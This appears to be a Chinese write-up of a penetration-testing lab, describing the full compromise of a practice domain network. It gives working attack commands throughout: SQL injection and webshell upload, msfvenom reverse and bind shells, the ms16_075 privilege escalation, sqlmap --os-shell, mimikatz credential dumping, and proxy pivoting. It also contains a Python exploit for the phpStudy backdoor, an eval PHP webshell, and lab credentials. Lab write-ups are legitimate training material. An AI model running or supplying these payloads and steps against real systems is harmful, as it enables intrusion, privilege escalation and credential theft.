此项目出自月师傅项目四
靶场网络图 (ps:kali ip 前后不一样,中途机器故障了重装了)
已知目标主机:
ip:192.168.137.95
域名:www.cc123.com
信息收集
网站信息:
子域名
www.cc123.com
ww2.cc123.com
new.cc123.com
打开new.cc123.com 发现为dedecms
百度查找历史漏洞发现存在sql注入 得到密码解码 admin7788 后台上传webshell
无法命令,查看目录得知 存在net系统上传asp大马
msf 生成木马 反弹shell
权限不足,所以需要扫描网站路径查找可读可写可执行
通过文件获取到
C:\windows\debug\WIA\
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<exploit ip> LPORT=4444 -f exe > s.exe
上传成功
监听端口
getuid 权限较低 提权 扫描可提取的漏洞 use post/multi/recon/local_exploit_suggester set session 1 exploit
使用ms16-075提权 use exploit/windows/local/ms16_075_reflection_juicy 不太稳定 试了两次
然后搜索flag
在查找flag的时候,会发现wwwroot下 有两个web目录,分别对应两个站点,后续渗透中,会发现是站库分离的,数据库密码就在当前机器上。
扫描ww2.cc123.com
目录扫描 python .\dirsearch.py -u http://ww2.cc123.com/ 登录后台 http://ww2.cc123.com/admin/ 编辑器 http://ww2.cc123.com/editor/ 弱口令爆破 cc123 万能密码也成功进入后台
抓包sqlmap扫描 前期asp大马也可以进行查看
http://ww2.cc123.com//admin/aboutadd.aspx?id=7&pid=6
将数据包保存到1.txt
python sqlmap.py -r 1.txt --dbms mssql -v 1 --batch
列出库 python sqlmap.py -r 1.txt --dbms mssql -v 1 --dbs
获取 mssql shell python sqlmap.py -r 1.txt --dbms mssql -v 1 --os-shell
.net 代码审计过,本人未接触过,步骤是使用软件反编译dll文件为代码然后审计
在session 查找web.config 这样大马才可以连接
ip:10.10.10.3
账号:sa
密码:!@#a123..
解码得
admin AE5F6187F32825CA cc123 B97C57DB005F954242450A255217DA9F admin cc123 cc123 qweasd123
内网渗透
查看ip
查看路由
run get_local_subnets
哈希获取
哈希解密比较费劲,加载 minikazi 获取明文密码(SYSTEM)
load kiwi kiwi_cmd sekurlsa::logonpasswords
添加路由渗透
run autoroute -s 10.10.10.0/24
启动socks 代理
use auxiliary/server/socks4a run
配置proxychina.conf
socks4 127.0.0.1 1080
获取数据库机器
目前已经知道了数据库的密码,需要进一步获取主机shell
msfvenom -p windows/meterpreter/bind_tcp LPORT=7777 -f exe > bind.exe
mssql 文件上传
开启监听
use exploit/multi/handler set payload windows/meterpreter/bind_tcp set RHOST 10.10.10.3 set lport 7777
当前session 是x86位数,要执行密码抓取,需要x64位数的进程
迁移进程获取密码
ps 查看进程 migrate pid
信息收集后发现又存在另一个c段
添加路由
run autoroute -s 10.10.1.0/24
探测存活主机
for /L %I in (1,1,254) Do @ping -w 1 -n 110.10.1.%I | findstr "TTL="
探测端口
proxychains nmap -sT -Pn 10.10.1.2
看到445优先考虑 会存在永恒之蓝,的确扫描出来了,但无session返回
浏览器设置代理
访问80
python 编写exp
import requests import sys import base64 shell = "system('"+sys.argv[1]+"');" shell_base64 = base64.b64encode(shell.encode('utf-8')) header={'Accept-charset':shell_base64,'Accept-Encoding':'gzip,deflate'} def exploit(url): html = requests.get(url=url,headers=header).text return html url = "http://10.10.1.2/" print(exploit(url))
proxychains3 python3 phpstudy.py "echo ^<?php @eval(\$_POST[\"shell\"]);?^>>c:\phpstudy\WWW\shell.php"
配置代理 kall 做为代理机器更改proxychina.conf
socks4 192.168.137.12 1080 # ip 改为本地ip
Windows 开启socks4
上传bind.exe
msf 正向监听
获取密码
meterpreter > kiwi_cmd sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process
再次迁移进程
整个内网已经全部拿下。
